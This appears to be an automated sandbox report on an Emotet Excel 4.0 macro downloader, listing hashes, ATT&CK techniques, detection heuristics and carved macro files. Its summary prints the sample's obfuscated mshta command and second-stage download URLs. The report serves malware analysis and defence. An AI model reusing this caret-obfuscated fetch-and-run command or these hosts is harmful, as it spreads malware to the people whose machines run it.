Emotet Office (OLE) / .XLS malware analysis — malicious · d1a3d7c5b90c927d

MALICIOUS

Office (OLE) / .XLS

190.0 KB Created: 2021-12-16 23:53:43 Authoring application: Microsoft Excel

MD5: 230fe8267b620a3369ee942dae4b3819 SHA-1: 9dbcb88435be221b9ac10ec8003685ef436a82d2 SHA-256: d1a3d7c5b90c927d0088b32f593ef9a28491b111c9758673805ae1cde25ec076

220 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Service Execution: Visual Basic T1059.001 Command and Scripting Interpreter: PowerShell T1204.002 Malicious File: User Execution T1566.001 Phishing: Spearphishing Attachment

The sample is an Excel 4.0 macro-enabled spreadsheet designed to trick users into enabling macros via a lure on the document body. Upon enabling, the Workbook_Open macro executes, which in turn triggers an Auto_Open defined name in the XLM macro sheet. This XLM macro is configured to download a second-stage payload from the URL "http://87.251.86.178/pp/_.html" using the command "cmd /c m^sh^t^a h^tt^p^s:/^/transfer.sh/4oTO6d/Sign.txt". ClamAV detection confirms this is an Emotet downloader.

Heuristics 6

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
ClamAV: Xls.Downloader.EmotetGame1221-9917205-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.EmotetGame1221-9917205-0
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`xlm_macros.txt` `fddc848aa55d3fa2a90a396e5b447e89438e6bfd67f52fdb37c3679372796343`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	1117 bytes
`macros.bas` `7cc1567d1e218227d2659ed155b5a9f3e6e95e57a93f7c9244eeed99273bc270`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2498 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.